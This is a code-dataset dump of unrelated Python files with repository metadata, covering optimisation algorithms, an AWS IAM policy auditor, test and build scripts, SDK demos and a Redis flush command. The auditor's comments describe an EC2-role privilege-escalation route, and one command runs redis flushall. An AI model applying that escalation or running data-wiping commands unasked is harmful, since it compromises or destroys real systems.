repo_name
stringlengths
7
94
repo_path
stringlengths
4
237
repo_head_hexsha
stringlengths
40
40
content
stringlengths
10
680k
apis
stringlengths
2
840k
sauloal/cnidaria
scripts/venv/lib/python2.7/site-packages/cogent/maths/function_optimisation.py
fe6f8c8dfed86d39c80f2804a753c05bb2e485b4
#!/usr/bin/env python """Algorthims for function optimisation great_deluge() is a hillclimbing algorithm based on: Gunter Dueck: New Optimization Heuristics, The Great Deluge Algorithm and the Record-to-Record Travel. Journal of Computational Physics, Vol. 104, 1993, pp. 86 - 92 ga_evolve() is a basic genetic algorithm in which all internal functions can be overridden NOTE: both optimisation functions are generators. """ from numpy.random import normal __author__ = "Daniel McDonald and Rob Knight" __copyright__ = "Copyright 2007-2012, The Cogent Project" __credits__ = ["Daniel McDonald", "Rob Knight"] __license__ = "GPL" __version__ = "1.5.3" __maintainer__ = "Daniel McDonald" __email__ = "[email protected]" __status__ = "Production" def _simple_breed(best, num, mutation_rate, random_f): """Returns num copies of parent with mutation_rate changes""" result = [] score, parent = best for child_number in range(num): if random_f() <= mutation_rate: child = parent.mutate() result.append(child) else: result.append(parent) return result def _simple_score(child, target): """Returns the childs score as defined by the childs scoring function""" return child.score(target) def _simple_init(parent, num): """Creates a list parent copies""" return [parent.copy() for i in range(num)] def _simple_select(population, scores): """Returns a tuple: (best_score, best_child)""" scored = zip(scores, population) scored.sort() return scored[0] def great_deluge(a, step_factor=500, max_iter=100, max_total_iters=1000): """This generator makes random variations of the object a to minimize cost. Yields are performed at the end of each iteration and a tuple containing ((iter_count, total_iters), a) is returned. iter_count is used to kill the while loop in the event that no new objects are found with a better cost. iter_count gets reset each time an object with a better cost is found. total_iters will kill the while loop when the total number of iterations through the loop reaches max_total_iters Object a must implement methods cost() and perturb() for evaluating the score and making mutations respectively. Usually, you'll want to write a wrapper that passes these through to methods of an internal data object, or functions acting on that object. """ water_level = curr_cost = a.cost() # can't be worse than initial guess step_size = abs(water_level)/step_factor iter_count = 0 total_iters = 0 while iter_count < max_iter and total_iters < max_total_iters: new = a.perturb() new_cost = new.cost() if new_cost < water_level: if new_cost < curr_cost: water_level = max(curr_cost, water_level - step_size) iter_count = 0 # WARNING: iter_count is reset here! curr_cost = new_cost a = new else: iter_count += 1 yield ((iter_count, total_iters), a) total_iters += 1 def ga_evolve(parent, target, num, mutation_rate=0.01, score_f=_simple_score, breed_f=_simple_breed, select_f=_simple_select, init_f=_simple_init, random_f=normal, max_generations=1000): """Evolves a population based on the parent to the target Parent must implement methods copy(), mutate(), and score(target) to be used with the simple default functions. Yields are performed at the end of each iteration and contain the tuple (generation, best). The default functions return the tuple (generation, (best_score, best_obj)). Arguments: parent: Object to create initial population from. target: The goal of the evolution. num: Population size. mutation_rate: Rate at which objects in the population are mutated. score_f: Function to score the object against the target. breed_f: Function to create new population with mutations select_f: Function to select best object(s) from the population random_f: Function to be used in breed_f max_generations: Kills while loop if max_generations is reached Overload default functions: score_f: Must take an object and a target score. Returns objects score. breed_f: Must take a tuple containing (scores, objects), the size of population, a mutation rate and random function to use. Returns a list containing the initial population. Default function takes only the best object, but this may not be desired behavior. select_f: Must take a population and scores. Returns a tuple containing the best scores and objects in the population. Default function returns only the best score and object. init_f: Must take an object and the size of the population. Returns a list containing the starting population """ generation = 0 population = init_f(parent, num) while generation < max_generations: scores = [score_f(child, target) for child in population] best = select_f(population, scores) population = breed_f(best, num, mutation_rate, random_f) yield (generation, best) generation += 1
[]
jonathanbglass/parallel_prowler
collect_policies.py
453774a69f078c7fce11c9bb72b6deab6fc04217
import argparse import boto3 import json import logging import os from progressbar import ProgressBar import sys """ Collects IAM Policies Evaluates policies looking for badness (*.*, Effect:Allow + NotAction) Need to add more tests/use cases """ def get_policies(profile): session = boto3.session.Session(profile_name=profile) myiam = session.client('iam') marker = None allPolicies = [] passcount = 1 while True: pbar = ProgressBar('Collecting Policies') print("Policy Collection, Pass Number: {}".format(passcount)) passcount += 1 if marker: response_iterator = myiam.list_policies(OnlyAttached=True, Marker=marker) else: response_iterator = myiam.list_policies(OnlyAttached=True) for p in pbar(response_iterator['Policies']): polVers = myiam.get_policy_version( PolicyArn=p['Arn'], VersionId=p['DefaultVersionId']) mypol = {'Policy': p, 'PolicyVersion': polVers['PolicyVersion']} allPolicies.append(mypol) pfl = open(os.path.join('policies/', p['PolicyName']+'.json'), 'w') pfl.write(json.dumps(mypol, default=str, indent=4)) pfl.close() ae = myiam.list_entities_for_policy(PolicyArn=p['Arn']) pfl = open(os.path.join('attachedentities/', p['PolicyName']+'.json'), 'w') pfl.write(json.dumps(ae, default=str, indent=4)) pfl.close() try: marker = response_iterator['Marker'] except KeyError: break print("\nTotal Policies: {}".format(len(allPolicies))) pbar = ProgressBar('\tChecking for Dangerous Policies') for p in pbar(allPolicies): # This section looks for bad/dangerous patterns # Pattern 1: Allow *.* # AWSLambdaRole { # 'Version': '2012-10-17', # 'Statement': [ # {'Effect': 'Allow', # 'Action': '*', # 'Resource': ['*'] # } # ] # } try: q = p['PolicyVersion']['Document']['Statement'][0] except Exception as e: print("Problem parsing this policy: {}".format(p)) logging.debug("Problem parsing this policy: {}".format(p)) print(e) continue try: if (q['Effect'] == "Allow" and '*' in q['Resource'] and '*' in q['Action']): print("Review Dangerous Policy: {} -> {}".format( p['Policy']['PolicyName'], p['PolicyVersion']['Document'])) except Exception as e: pass # Pattern 2: Allow: *, NotAction # {'Version': '2012-10-17', # 'Statement': [ # { # 'Effect': 'Allow', # 'NotAction': ['iam:*', 'organizations:*', 'account:*'], # 'Resource': '*' # }, # { # 'Effect': 'Allow', # 'Action': [ 'iam:CreateServiceLinkedRole', # 'iam:DeleteServiceLinkedRole', # 'iam:ListRoles', # 'organizations:DescribeOrganization', # 'account:ListRegions' # ], # 'Resource': '*' # } # ]} # This policy blacklists all 'iam:*', 'organizations:*', and # 'accounts:*' with the NotAction. Then it grants specific # access in the next stanza ('iam:ListRoles', etc) # The fatal flaw is that it grants access to everything else, # like lambda or ec2 because of the "Allow" in the first stanza. # This user can create an EC2 instance, attach an admin role to # it, and login and give themselves access to Admin. Instance # privilege escalation. try: if (q['NotAction'] and q['Effect'] == 'Allow' and q['Resource'] == '*'): print("Review Suspect Policy: {} -> {}".format( p['Policy']['PolicyName'], p['PolicyVersion']['Document'])) except Exception as e: pass return def check_args_creds(args): # handle profiles / authentication / credentials workingCreds = False global logging global workingProfiles workingProfiles = [] if not args.profile: logging.info("Using AWS Default Profile") if (not check_profile("default")): logging.error("Default credentials not working.") print("Default credentials not working.") quit() else: workingProfiles.append("default") workingCreds = True if args.profile and args.profile is not None: logging.info("Using " + args.profile + " Profile") if (not check_profile(args.profile)): logging.error("Profile " + args.profile + " not working") exit(1) else: logging.info("Profile " + args.profile + " working") workingProfiles.append(args.profile) workingCreds = True return args.profile def check_profile(profile): global logging try: if(profile == "default"): client = boto3.session.Session() else: logging.info("Testing profile: " + profile) client = boto3.session.Session(profile_name=profile) except Exception as e: logging.error("Error connecting: ") logging.error(e) return False try: iam = client.client('iam') response = iam.list_users() except Exception as e: logging.error("Error listing users: ") logging.error(e) return False if len(response['Users']) == 0: logging.info("No users") if len(response) > 0: usercnt = len(response['Users']) if(usercnt > 1): userresp = " Users" else: userresp = " User" logging.info(str(usercnt) + userresp) return True def setup_args(parser): parser.add_argument("-p", "--profile", help="AWS Profile") parser.add_argument("-l", "--log", help="Log Level") def main(): global logging parser = argparse.ArgumentParser() setup_args(parser) global args args = parser.parse_args() if args.log and args.log.upper() == "DEBUG": loglevel = "DEBUG" else: loglevel = "INFO" logging.basicConfig(filename='policyAssessment.log', format='%(levelname)s:%(message)s', level=loglevel) profile = check_args_creds(args) get_policies(profile) if __name__ == "__main__": # execute only if run as a script main()
[((19, 14, 19, 57), 'boto3.session.Session', 'boto3.session.Session', (), '', False, 'import boto3\n'), ((51, 11, 51, 59), 'progressbar.ProgressBar', 'ProgressBar', ({(51, 23, 51, 58): '"""\tChecking for Dangerous Policies"""'}, {}), "('\\tChecking for Dangerous Policies')", False, 'from progressbar import ProgressBar\n'), ((189, 13, 189, 38), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ({}, {}), '()', False, 'import argparse\n'), ((197, 4, 199, 39), 'logging.basicConfig', 'logging.basicConfig', (), '', False, 'import logging\n'), ((25, 15, 25, 49), 'progressbar.ProgressBar', 'ProgressBar', ({(25, 27, 25, 48): '"""Collecting Policies"""'}, {}), "('Collecting Policies')", False, 'from progressbar import ProgressBar\n'), ((129, 8, 129, 49), 'logging.info', 'logging.info', ({(129, 21, 129, 48): '"""Using AWS Default Profile"""'}, {}), "('Using AWS Default Profile')", False, 'import logging\n'), ((138, 8, 138, 58), 'logging.info', 'logging.info', ({(138, 21, 138, 57): "('Using ' + args.profile + ' Profile')"}, {}), "('Using ' + args.profile + ' Profile')", False, 'import logging\n'), ((169, 8, 169, 32), 'logging.info', 'logging.info', ({(169, 21, 169, 31): '"""No users"""'}, {}), "('No users')", False, 'import logging\n'), ((131, 12, 131, 61), 'logging.error', 'logging.error', ({(131, 26, 131, 60): '"""Default credentials not working."""'}, {}), "('Default credentials not working.')", False, 'import logging\n'), ((140, 12, 140, 69), 'logging.error', 'logging.error', ({(140, 26, 140, 68): "('Profile ' + args.profile + ' not working')"}, {}), "('Profile ' + args.profile + ' not working')", False, 'import logging\n'), ((143, 12, 143, 64), 'logging.info', 'logging.info', ({(143, 25, 143, 63): "('Profile ' + args.profile + ' working')"}, {}), "('Profile ' + args.profile + ' working')", False, 'import logging\n'), ((153, 21, 153, 44), 'boto3.session.Session', 'boto3.session.Session', ({}, {}), '()', False, 'import boto3\n'), ((155, 12, 155, 55), 'logging.info', 'logging.info', ({(155, 25, 155, 54): "('Testing profile: ' + profile)"}, {}), "('Testing profile: ' + profile)", False, 'import logging\n'), ((156, 21, 156, 64), 'boto3.session.Session', 'boto3.session.Session', (), '', False, 'import boto3\n'), ((158, 8, 158, 43), 'logging.error', 'logging.error', ({(158, 22, 158, 42): '"""Error connecting: """'}, {}), "('Error connecting: ')", False, 'import logging\n'), ((159, 8, 159, 24), 'logging.error', 'logging.error', ({(159, 22, 159, 23): 'e'}, {}), '(e)', False, 'import logging\n'), ((165, 8, 165, 46), 'logging.error', 'logging.error', ({(165, 22, 165, 45): '"""Error listing users: """'}, {}), "('Error listing users: ')", False, 'import logging\n'), ((166, 8, 166, 24), 'logging.error', 'logging.error', ({(166, 22, 166, 23): 'e'}, {}), '(e)', False, 'import logging\n'), ((38, 23, 38, 73), 'os.path.join', 'os.path.join', ({(38, 36, 38, 47): '"""policies/"""', (38, 49, 38, 72): "p['PolicyName'] + '.json'"}, {}), "('policies/', p['PolicyName'] + '.json')", False, 'import os\n'), ((39, 22, 39, 62), 'json.dumps', 'json.dumps', (), '', False, 'import json\n'), ((42, 23, 43, 60), 'os.path.join', 'os.path.join', ({(42, 36, 42, 55): '"""attachedentities/"""', (43, 36, 43, 59): "p['PolicyName'] + '.json'"}, {}), "('attachedentities/', p['PolicyName'] + '.json')", False, 'import os\n'), ((44, 22, 44, 59), 'json.dumps', 'json.dumps', (), '', False, 'import json\n')]
StackVista/stackstate-agent
test/molecule-role/molecule/integrations/tests/test_nagios.py
843f66189fae107646c57f71fed962bdaab3b3be
import json import os import re from testinfra.utils.ansible_runner import AnsibleRunner import util testinfra_hosts = AnsibleRunner(os.environ['MOLECULE_INVENTORY_FILE']).get_hosts('agent-integrations') def _get_key_value(tag_list): for key, value in (pair.split(':', 1) for pair in tag_list): yield key, value def _component_data(json_data, type_name, external_id_assert_fn, tags_assert_fn): for message in json_data["messages"]: p = message["message"]["TopologyElement"]["payload"] if "TopologyComponent" in p and \ p["TopologyComponent"]["typeName"] == type_name and \ external_id_assert_fn(p["TopologyComponent"]["externalId"]): data = json.loads(p["TopologyComponent"]["data"]) if tags_assert_fn(dict(_get_key_value(data["tags"]))): return data return None def test_nagios_mysql(host): def assert_topology(): topo_url = "http://localhost:7070/api/topic/sts_topo_process_agents?limit=1500" data = host.check_output('curl "{}"'.format(topo_url)) json_data = json.loads(data) with open("./topic-nagios-topo-process-agents.json", 'w') as f: json.dump(json_data, f, indent=4) external_id_pattern = re.compile(r"urn:container:/agent-integrations:.*") components = [ { "assertion": "Should find the nagios container", "type": "container", "external_id": lambda e_id: external_id_pattern.findall(e_id), "tags": lambda t: t["container_name"] == "ubuntu_nagios_1" }, { "assertion": "Should find the mysql container", "type": "container", "external_id": lambda e_id: external_id_pattern.findall(e_id), "tags": lambda t: t["container_name"] == "ubuntu_mysql_1" } ] for c in components: print("Running assertion for: " + c["assertion"]) assert _component_data( json_data=json_data, type_name=c["type"], external_id_assert_fn=c["external_id"], tags_assert_fn=c["tags"], ) is not None util.wait_until(assert_topology, 30, 3) def test_container_metrics(host): url = "http://localhost:7070/api/topic/sts_multi_metrics?limit=1000" def wait_for_metrics(): data = host.check_output("curl \"%s\"" % url) json_data = json.loads(data) with open("./topic-nagios-sts-multi-metrics.json", 'w') as f: json.dump(json_data, f, indent=4) def get_keys(m_host): return set( ''.join(message["message"]["MultiMetric"]["values"].keys()) for message in json_data["messages"] if message["message"]["MultiMetric"]["name"] == "convertedMetric" and message["message"]["MultiMetric"]["host"] == m_host ) expected = {'nagios.http.size', 'nagios.ping.pl', 'nagios.http.time', 'nagios.current_load.load15', 'nagios.swap_usage.swap', 'nagios.host.pl', 'nagios.root_partition', 'nagios.current_users.users', 'nagios.current_load.load1', 'nagios.host.rta', 'nagios.ping.rta', 'nagios.current_load.load5', 'nagios.total_processes.procs'} assert all([expectedMetric for expectedMetric in expected if expectedMetric in get_keys("agent-integrations")]) util.wait_until(wait_for_metrics, 180, 3)
[((62, 4, 62, 43), 'util.wait_until', 'util.wait_until', ({(62, 20, 62, 35): 'assert_topology', (62, 37, 62, 39): '(30)', (62, 41, 62, 42): '(3)'}, {}), '(assert_topology, 30, 3)', False, 'import util\n'), ((88, 4, 88, 45), 'util.wait_until', 'util.wait_until', ({(88, 20, 88, 36): 'wait_for_metrics', (88, 38, 88, 41): '(180)', (88, 43, 88, 44): '(3)'}, {}), '(wait_for_metrics, 180, 3)', False, 'import util\n'), ((9, 18, 9, 70), 'testinfra.utils.ansible_runner.AnsibleRunner', 'AnsibleRunner', ({(9, 32, 9, 69): "os.environ['MOLECULE_INVENTORY_FILE']"}, {}), "(os.environ['MOLECULE_INVENTORY_FILE'])", False, 'from testinfra.utils.ansible_runner import AnsibleRunner\n'), ((33, 20, 33, 36), 'json.loads', 'json.loads', ({(33, 31, 33, 35): 'data'}, {}), '(data)', False, 'import json\n'), ((37, 30, 37, 81), 're.compile', 're.compile', ({(37, 41, 37, 80): '"""urn:container:/agent-integrations:.*"""'}, {}), "('urn:container:/agent-integrations:.*')", False, 'import re\n'), ((70, 20, 70, 36), 'json.loads', 'json.loads', ({(70, 31, 70, 35): 'data'}, {}), '(data)', False, 'import json\n'), ((23, 19, 23, 61), 'json.loads', 'json.loads', ({(23, 30, 23, 60): "p['TopologyComponent']['data']"}, {}), "(p['TopologyComponent']['data'])", False, 'import json\n'), ((35, 12, 35, 45), 'json.dump', 'json.dump', (), '', False, 'import json\n'), ((72, 12, 72, 45), 'json.dump', 'json.dump', (), '', False, 'import json\n')]
papsebestyen/erudition
erudition/util.py
35aa502a96189131baff714a6212eb56de2b1272
import os import sys from contextlib import contextmanager from invoke import UnexpectedExit def git_commit(c, addstr, msg): try: c.run("git config --get user.email") c.run("git config --get user.name") except UnexpectedExit: c.run('git config --local user.email "[email protected]"') c.run('git config --local user.name "CI/CD"') c.run(f'git add {addstr} && git commit -m "{msg}"') @contextmanager def cd_into(dirpath): wd = os.getcwd() os.chdir(dirpath) sys.path.insert(0, str(dirpath)) yield os.chdir(wd) sys.path.pop(0)
[((20, 9, 20, 20), 'os.getcwd', 'os.getcwd', ({}, {}), '()', False, 'import os\n'), ((21, 4, 21, 21), 'os.chdir', 'os.chdir', ({(21, 13, 21, 20): 'dirpath'}, {}), '(dirpath)', False, 'import os\n'), ((24, 4, 24, 16), 'os.chdir', 'os.chdir', ({(24, 13, 24, 15): 'wd'}, {}), '(wd)', False, 'import os\n'), ((25, 4, 25, 19), 'sys.path.pop', 'sys.path.pop', ({(25, 17, 25, 18): '(0)'}, {}), '(0)', False, 'import sys\n')]
MeekoI/ais-sdk
python3/distortion_correct_aksk_demo.py
76240abc49795e914988f3cafb6d08f60dbdcb4c
# -*- coding:utf-8 -*- from ais_sdk.utils import encode_to_base64 from ais_sdk.utils import decode_to_wave_file from ais_sdk.distortion_correct import distortion_correct_aksk from ais_sdk.utils import init_global_env import json if __name__ == '__main__': # # access moderation distortion correct.post data by ak,sk # app_key = '*************' app_secret = '************' init_global_env(region='cn-north-1') demo_data_url = 'https://ais-sample-data.obs.cn-north-1.myhuaweicloud.com/vat-invoice.jpg' #call interface use the url correction is true means do not correction result = distortion_correct_aksk(app_key, app_secret, "", demo_data_url, True) result_obj = json.loads(result) if result_obj['result']['data'] != '': decode_to_wave_file(result_obj['result']['data'], 'data/moderation-distortion-aksk-1.png') else: print(result) # call interface use the file result = distortion_correct_aksk(app_key, app_secret, encode_to_base64('data/moderation-distortion.jpg'), '', True) result_obj = json.loads(result) if result_obj['result']['data'] != '': decode_to_wave_file(result_obj['result']['data'], 'data/moderation-distortion-aksk-2.png') else: print(result)
[((14, 4, 14, 40), 'ais_sdk.utils.init_global_env', 'init_global_env', (), '', False, 'from ais_sdk.utils import init_global_env\n'), ((19, 13, 19, 82), 'ais_sdk.distortion_correct.distortion_correct_aksk', 'distortion_correct_aksk', ({(19, 37, 19, 44): 'app_key', (19, 46, 19, 56): 'app_secret', (19, 58, 19, 60): '""""""', (19, 62, 19, 75): 'demo_data_url', (19, 77, 19, 81): 'True'}, {}), "(app_key, app_secret, '', demo_data_url, True)", False, 'from ais_sdk.distortion_correct import distortion_correct_aksk\n'), ((20, 17, 20, 35), 'json.loads', 'json.loads', ({(20, 28, 20, 34): 'result'}, {}), '(result)', False, 'import json\n'), ((28, 17, 28, 35), 'json.loads', 'json.loads', ({(28, 28, 28, 34): 'result'}, {}), '(result)', False, 'import json\n'), ((22, 8, 22, 98), 'ais_sdk.utils.decode_to_wave_file', 'decode_to_wave_file', ({(22, 28, 22, 56): "result_obj['result']['data']", (22, 58, 22, 97): '"""data/moderation-distortion-aksk-1.png"""'}, {}), "(result_obj['result']['data'],\n 'data/moderation-distortion-aksk-1.png')", False, 'from ais_sdk.utils import decode_to_wave_file\n'), ((27, 58, 27, 108), 'ais_sdk.utils.encode_to_base64', 'encode_to_base64', ({(27, 75, 27, 107): '"""data/moderation-distortion.jpg"""'}, {}), "('data/moderation-distortion.jpg')", False, 'from ais_sdk.utils import encode_to_base64\n'), ((30, 8, 30, 98), 'ais_sdk.utils.decode_to_wave_file', 'decode_to_wave_file', ({(30, 28, 30, 56): "result_obj['result']['data']", (30, 58, 30, 97): '"""data/moderation-distortion-aksk-2.png"""'}, {}), "(result_obj['result']['data'],\n 'data/moderation-distortion-aksk-2.png')", False, 'from ais_sdk.utils import decode_to_wave_file\n')]
Arpit8081/Phishtray_Edited_Version
exercise/migrations/0016_auto_20191025_1624.py
9f3342e6fd2620b7f01ad91ce5b36fa8ea111bc8
# Generated by Django 2.2.6 on 2019-10-25 16:24 from django.db import migrations, models import django.db.models.deletion class Migration(migrations.Migration): dependencies = [ ('exercise', '0015_exerciseemailproperties_date_received'), ] operations = [ migrations.AlterField( model_name='exercise', name='copied_from', field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.DO_NOTHING, to='exercise.Exercise'), ), ]
[((17, 18, 17, 130), 'django.db.models.ForeignKey', 'models.ForeignKey', (), '', False, 'from django.db import migrations, models\n')]
YKato521/ironpython-stubs
release/stubs.min/Autodesk/Revit/DB/__init___parts/GeomCombinationSet.py
b1f7c580de48528490b3ee5791b04898be95a9ae
class GeomCombinationSet(APIObject, IDisposable, IEnumerable): """ A set that contains GeomCombination objects. GeomCombinationSet() """ def Clear(self): """ Clear(self: GeomCombinationSet) Removes every item GeomCombination the set,rendering it empty. """ pass def Contains(self, item): """ Contains(self: GeomCombinationSet,item: GeomCombination) -> bool Tests for the existence of an GeomCombination within the set. item: The element to be searched for. Returns: The Contains method returns True if the GeomCombination is within the set, otherwise False. """ pass def Dispose(self): """ Dispose(self: GeomCombinationSet,A_0: bool) """ pass def Erase(self, item): """ Erase(self: GeomCombinationSet,item: GeomCombination) -> int Removes a specified GeomCombination from the set. item: The GeomCombination to be erased. Returns: The number of GeomCombinations that were erased from the set. """ pass def ForwardIterator(self): """ ForwardIterator(self: GeomCombinationSet) -> GeomCombinationSetIterator Retrieve a forward moving iterator to the set. Returns: Returns a forward moving iterator to the set. """ pass def GetEnumerator(self): """ GetEnumerator(self: GeomCombinationSet) -> IEnumerator Retrieve a forward moving iterator to the set. Returns: Returns a forward moving iterator to the set. """ pass def Insert(self, item): """ Insert(self: GeomCombinationSet,item: GeomCombination) -> bool Insert the specified element into the set. item: The GeomCombination to be inserted into the set. Returns: Returns whether the GeomCombination was inserted into the set. """ pass def ReleaseManagedResources(self, *args): """ ReleaseManagedResources(self: APIObject) """ pass def ReleaseUnmanagedResources(self, *args): """ ReleaseUnmanagedResources(self: GeomCombinationSet) """ pass def ReverseIterator(self): """ ReverseIterator(self: GeomCombinationSet) -> GeomCombinationSetIterator Retrieve a backward moving iterator to the set. Returns: Returns a backward moving iterator to the set. """ pass def __enter__(self, *args): """ __enter__(self: IDisposable) -> object """ pass def __exit__(self, *args): """ __exit__(self: IDisposable,exc_type: object,exc_value: object,exc_back: object) """ pass def __init__(self, *args): """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """ pass def __iter__(self, *args): """ __iter__(self: IEnumerable) -> object """ pass IsEmpty = property(lambda self: object(), lambda self, v: None, lambda self: None) """Test to see if the set is empty. Get: IsEmpty(self: GeomCombinationSet) -> bool """ Size = property(lambda self: object(), lambda self, v: None, lambda self: None) """Returns the number of GeomCombinations that are in the set. Get: Size(self: GeomCombinationSet) -> int """
[]
omribahumi/rainbow
rainbow/datasources/cfn_datasource.py
17aad61231b1f1b9d0dca43979e2fa4c8a1603f3
from rainbow.cloudformation import Cloudformation from base import DataSourceBase __all__ = ['CfnOutputsDataSource', 'CfnResourcesDataSource', 'CfnParametersDataSource'] class CfnDataSourceBase(DataSourceBase): def __init__(self, data_source): super(CfnDataSourceBase, self).__init__(data_source) stack_name = data_source region = Cloudformation.default_region if ':' in data_source: region, stack_name = data_source.split(':', 1) cfn_connection = Cloudformation(region) if not cfn_connection: raise Exception('Invalid region %r' % (region,)) self.stack = cfn_connection.describe_stack(stack_name) class CfnOutputsDataSource(CfnDataSourceBase): datasource_name = 'cfn_outputs' def __init__(self, data_source): super(CfnOutputsDataSource, self).__init__(data_source) self.data = {i.key: i.value for i in self.stack.outputs} class CfnResourcesDataSource(CfnDataSourceBase): datasource_name = 'cfn_resources' def __init__(self, data_source): super(CfnResourcesDataSource, self).__init__(data_source) self.data = {r.logical_resource_id: r.physical_resource_id for r in self.stack.describe_resources()} class CfnParametersDataSource(CfnDataSourceBase): datasource_name = 'cfn_parameters' def __init__(self, data_source): super(CfnParametersDataSource, self).__init__(data_source) self.data = {p.key: p.value for p in self.stack.parameters}
[((17, 25, 17, 47), 'rainbow.cloudformation.Cloudformation', 'Cloudformation', ({(17, 40, 17, 46): 'region'}, {}), '(region)', False, 'from rainbow.cloudformation import Cloudformation\n')]
idan/pypostbin
epio_commands/management/commands/epio_flush_redis.py
61dd1c0960e8fb6e4460a5623971cbbc78a55ee7
import redis from bundle_config import config from django.core.management.base import NoArgsCommand class Command(NoArgsCommand): help = 'Flushes all keys in redis.' def handle_noargs(self, **options): r = redis.Redis(host=config['redis']['host'], port=int(config['redis']['port']), password=config['redis']['password']) r.flushall() print "All redis keys flushed."
[]
zmxdream/FlexFlow
python/flexflow_cffi_build.py
7ea50d71a02e853af7ae573d88c911511b3e82e0
#!/usr/bin/env python # Copyright 2020 Stanford University, Los Alamos National Laboratory # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # from __future__ import absolute_import, division, print_function, unicode_literals import argparse import os import subprocess def find_flexflow_header(ffhome_dir): def try_prefix(prefix_dir): flexflow_ch_path = os.path.join(prefix_dir, 'python', 'flexflow_c.h') flexflow_cxxh_path = os.path.join(prefix_dir, 'include', 'model.h') if os.path.exists(flexflow_ch_path) and os.path.exists(flexflow_cxxh_path): flexflow_cxxh_dir = os.path.join(prefix_dir, 'include') return flexflow_cxxh_dir, flexflow_ch_path result = try_prefix(ffhome_dir) if result: return result raise Exception('Unable to locate flexflow_c.h and flexflow.h header file') def build(output_dir, libname, ffhome_dir): flexflow_cxxh_dir, flexflow_ch_path = find_flexflow_header(ffhome_dir) header = subprocess.check_output(['gcc', '-I', flexflow_cxxh_dir, '-E', '-P', flexflow_ch_path]).decode('utf-8') with open(os.path.join(os.path.dirname(os.path.realpath(__file__)), 'flexflow_cffi_header.py.in')) as f: content = f.read() content = content.format(header=repr(header), libname=repr(libname)) if output_dir is None: output_dir = os.path.dirname(os.path.realpath(__file__)) with open(os.path.join(output_dir, 'flexflow_cffi_header.py'), 'wb') as f: f.write(content.encode('utf-8')) if __name__ == "__main__": parser = argparse.ArgumentParser() parser.add_argument('--ffhome-dir', required=True) parser.add_argument('--libname', required=True) parser.add_argument('--output-dir', required=False) args = parser.parse_args() build(args.output_dir, args.libname, args.ffhome_dir)
[((54, 13, 54, 38), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ({}, {}), '()', False, 'import argparse\n'), ((26, 27, 26, 77), 'os.path.join', 'os.path.join', ({(26, 40, 26, 50): 'prefix_dir', (26, 52, 26, 60): '"""python"""', (26, 62, 26, 76): '"""flexflow_c.h"""'}, {}), "(prefix_dir, 'python', 'flexflow_c.h')", False, 'import os\n'), ((27, 29, 27, 75), 'os.path.join', 'os.path.join', ({(27, 42, 27, 52): 'prefix_dir', (27, 54, 27, 63): '"""include"""', (27, 65, 27, 74): '"""model.h"""'}, {}), "(prefix_dir, 'include', 'model.h')", False, 'import os\n'), ((28, 11, 28, 43), 'os.path.exists', 'os.path.exists', ({(28, 26, 28, 42): 'flexflow_ch_path'}, {}), '(flexflow_ch_path)', False, 'import os\n'), ((28, 48, 28, 82), 'os.path.exists', 'os.path.exists', ({(28, 63, 28, 81): 'flexflow_cxxh_path'}, {}), '(flexflow_cxxh_path)', False, 'import os\n'), ((29, 32, 29, 67), 'os.path.join', 'os.path.join', ({(29, 45, 29, 55): 'prefix_dir', (29, 57, 29, 66): '"""include"""'}, {}), "(prefix_dir, 'include')", False, 'import os\n'), ((41, 13, 41, 100), 'subprocess.check_output', 'subprocess.check_output', ({(41, 37, 41, 99): "['gcc', '-I', flexflow_cxxh_dir, '-E', '-P', flexflow_ch_path]"}, {}), "(['gcc', '-I', flexflow_cxxh_dir, '-E', '-P',\n flexflow_ch_path])", False, 'import subprocess\n'), ((48, 37, 48, 63), 'os.path.realpath', 'os.path.realpath', ({(48, 54, 48, 62): '__file__'}, {}), '(__file__)', False, 'import os\n'), ((50, 14, 50, 65), 'os.path.join', 'os.path.join', ({(50, 27, 50, 37): 'output_dir', (50, 39, 50, 64): '"""flexflow_cffi_header.py"""'}, {}), "(output_dir, 'flexflow_cffi_header.py')", False, 'import os\n'), ((43, 43, 43, 69), 'os.path.realpath', 'os.path.realpath', ({(43, 60, 43, 68): '__file__'}, {}), '(__file__)', False, 'import os\n')]
tuxcell/gaphor
gaphor/plugins/xmiexport/__init__.py
22eb13479f589a0105ad25a11aed968e9ad932dc
"""This plugin extends Gaphor with XMI export functionality.""" import logging from gaphor.abc import ActionProvider, Service from gaphor.core import action, gettext from gaphor.plugins.xmiexport import exportmodel from gaphor.ui.filedialog import FileDialog logger = logging.getLogger(__name__) class XMIExport(Service, ActionProvider): def __init__(self, element_factory, file_manager, export_menu): self.element_factory = element_factory self.file_manager = file_manager export_menu.add_actions(self) def shutdown(self): pass @action( name="file-export-xmi", label=gettext("Export to XMI"), tooltip=gettext("Export model to XMI (XML Model Interchange) format"), ) def execute(self): filename = self.file_manager.filename filename = filename.replace(".gaphor", ".xmi") if filename else "model.xmi" file_dialog = FileDialog( gettext("Export model to XMI file"), action="save", filename=filename ) filename = file_dialog.selection if filename and len(filename) > 0: logger.debug(f"Exporting XMI model to: {filename}") export = exportmodel.XMIExport(self.element_factory) try: export.export(filename) except Exception as e: logger.error(f"Error while saving model to file {filename}: {e}")
